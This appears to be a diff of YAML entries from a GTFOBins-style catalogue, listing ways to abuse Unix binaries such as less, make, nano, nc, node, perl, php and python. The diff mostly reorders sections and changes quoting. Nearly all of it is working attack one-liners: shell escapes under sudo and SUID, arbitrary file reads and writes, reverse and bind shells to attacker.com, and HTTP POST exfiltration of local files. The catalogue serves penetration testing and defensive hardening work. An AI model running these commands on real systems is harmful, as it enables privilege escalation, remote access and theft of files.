file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
- code: "./ksh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
@ -9,9 +9,9 @@ description: |
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
- code: "/lib/ld.so /bin/sh"
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
- code: "./ld.so /bin/sh -p"
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -1,21 +1,22 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
file-read:
|
||||
- code: |
|
||||
less file_to_read
|
||||
- code: 'less file_to_read
|
||||
|
||||
'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ltrace -b -L /bin/sh
|
||||
- code: ltrace -b -L /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -5,20 +5,20 @@ description: |
|
||||
passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
file-write:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
---
|
||||
|
@ -1,18 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: |
|
||||
man file_to_read
|
||||
- code: 'man file_to_read
|
||||
|
||||
'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./more file_to_read
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: |
|
||||
more file_to_read
|
||||
- code: 'more file_to_read
|
||||
|
||||
'
|
||||
suid-enabled:
|
||||
- code: "./more file_to_read\n"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,37 +1,38 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
file-read:
|
||||
- code: |
|
||||
nano file_to_read
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'nano file_to_read
|
||||
|
||||
'
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
---
|
||||
|
@ -1,27 +1,29 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
---
|
||||
|
@ -1,17 +1,19 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by a leading space added to each line.
|
||||
description: 'The read file content is corrupted by a leading space added to each
|
||||
line.
|
||||
|
||||
'
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
---
|
||||
|
@ -1,33 +1,38 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
|
||||
|
||||
'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
|
||||
1, 2]});''
|
||||
|
||||
'
|
||||
sudo-enabled:
|
||||
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
|
||||
2]});''
|
||||
|
||||
'
|
||||
---
|
||||
|
@ -3,16 +3,16 @@ description: |
|
||||
Three spaces are added before each character in the read file, and
|
||||
non-printable chars are printed as backslash escape sequences.
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
---
|
||||
|
@ -17,33 +17,34 @@ functions:
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
---
|
||||
|
@ -1,37 +1,38 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo pico -s $TF /etc/hosts
|
||||
^T
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./pico -s $TF /etc/hosts
|
||||
^T
|
||||
file-read:
|
||||
- code: |
|
||||
pico file_to_read
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'pico file_to_read
|
||||
|
||||
'
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./pico -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo pico -s $TF /etc/hosts
|
||||
^T
|
||||
---
|
||||
|
@ -1,23 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: The executed command output shown in the puppet log format.
|
||||
code: |
|
||||
export CMD="/usr/bin/id"
|
||||
puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||
sudo-enabled:
|
||||
- description: The executed command output shown in the puppet log format.
|
||||
code: |
|
||||
export CMD="/usr/bin/id"
|
||||
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||
file-read:
|
||||
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
puppet filebucket -l diff /dev/null $LFILE
|
||||
- description: The executed command output shown in the puppet log format.
|
||||
code: |
|
||||
export CMD="/usr/bin/id"
|
||||
puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||
file-write:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
export LFILE="/tmp/file_to_write"
|
||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
export LFILE="/tmp/file_to_write"
|
||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||
file-read:
|
||||
- description: The read file content is corrupted by the `diff` output format. The
|
||||
actual `/usr/bin/diff` command is executed.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
puppet filebucket -l diff /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
- description: The executed command output shown in the puppet log format.
|
||||
code: |
|
||||
export CMD="/usr/bin/id"
|
||||
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
|
||||
---
|
||||
|
@ -1,37 +1,39 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python2 -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
file-read:
|
||||
- code: python2 -c 'open("file_to_read").read()'
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||
HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python2 -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||
file-read:
|
||||
- code: python2 -c 'open("file_to_read").read()'
|
||||
load-library:
|
||||
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
suid-enabled:
|
||||
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||
---
|
||||
|
@ -1,37 +1,39 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
file-read:
|
||||
- code: python3 -c 'open("file_to_read").read()'
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||
HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||
file-read:
|
||||
- code: python3 -c 'open("file_to_read").read()'
|
